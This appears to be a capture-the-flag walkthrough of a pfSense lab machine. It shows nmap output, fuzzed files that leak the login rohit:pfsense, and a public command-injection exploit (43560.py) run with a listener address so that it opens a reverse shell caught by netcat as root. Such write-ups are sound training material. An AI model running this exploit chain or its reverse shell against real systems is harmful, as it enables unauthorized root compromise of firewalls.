Sense

Linux
Easy

Recon

Nmap

Nmap scan report for 10.129.99.201
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.129.99.201/
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after:  2023-04-06T19:21:35
| MD5:   65f8 b00f 57d2 3468 2c52 0f44 8110 c622
|_SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02
|_ssl-date: TLS randomness does not represent time

Port 80

We only get redirects to 443 in this port.

Port 443

Directory fuzzing shows some directories:

/changelog.txt

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

Fuzzing deeper we find some text files
- A user is revelaed so we can login into PfSense with creds rohit:pfsense

Exploiting pfSense

Searchexploit

This command injection seems nice, we try it.

╰─❯ python3 43560.py --rhost 10.129.99.201 --lhost 10.10.14.58 --lport 4444 --username rohit --password pfsense 
CSRF token obtained
Running exploit...
Exploit completed

# On other terminal
╰─❯ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.58] from (UNKNOWN) [10.129.99.201] 4776
sh: can't access tty; job control turned off
id
uid=0(root) gid=0(wheel) groups=0(wheel)